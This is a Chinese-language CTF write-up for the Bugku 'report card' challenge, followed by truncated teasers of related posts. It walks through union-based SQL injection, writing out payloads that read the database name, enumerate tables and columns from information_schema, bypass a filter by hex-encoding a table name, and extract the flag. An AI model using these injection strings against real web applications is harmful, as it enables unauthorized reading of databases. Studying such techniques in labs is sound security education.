題目位址
因為個人是個小白,看到題目毫無頭緒。在網上搜到wp,參考著得以理解。
這個題目需要手動爆破資料庫的 庫名、表名、列名、內容。
庫名
用資料庫聯合查詢語句: id=-1』 union select 1,2,3,database()#得到資料庫名字skctf_flag
表名
id=-1』 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名fl4g,sc。 flag顯然在fl4g中。
列名
id=-1』 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#
這裡需要說明,爆破列名時,如果直接使用「fl4g」,查詢無果,考慮到是過濾,進行ascall轉十六進製制查詢。得到列明欄位skctf_flag。
內容
id=-1』 union select 1,2,3,skctf_flag from fl4g# 得到flag。
做這個題目,最直觀的感受是對sql注入的進一步理解,之前遇到此類題目,完全沒有任何思路,相信以後遇到注入題目能逐漸加深認識吧。
bugku 成績單詳解
bugku 成績單詳解 首先開啟查詢成績的頁面 當你這樣去試了之後,就會發現當輸入id 1,2,3,的時候分別有三個孩子的成績,但是當id 4的時候,成績單裡面的成績又為空了。因此我們可以猜測資料庫裡面一共是有四列的 然後在此處利用內建函式database 爆破獲取資料庫的名字。此處可以看出資料庫的...
BUGKU 本地包含 成績單)
在網頁中新建標籤頁開啟鏈結後出現以下一些php 下面解析這段 r eq uest 這個變數 和 request這個變數和 r eque st這個 變數和 get post一樣,都屬於超級全域性變數,執行時修改後者不會影響前者,修改後者不會影響前者。在這裡可以以get post cookies等方式把...
成績單型別
cjd 雙單引號是注釋 成績單學號 d20c055 s s是字串輸出 你的成績如下 高等數學 f分 f是浮點數輸出,f前加數字幾就保留幾位 python程式設計基礎 f分 形勢與政策 f分 大學英語 f分 xuehao input 請輸入數字 sc float input 請輸入高等數學分數 py ...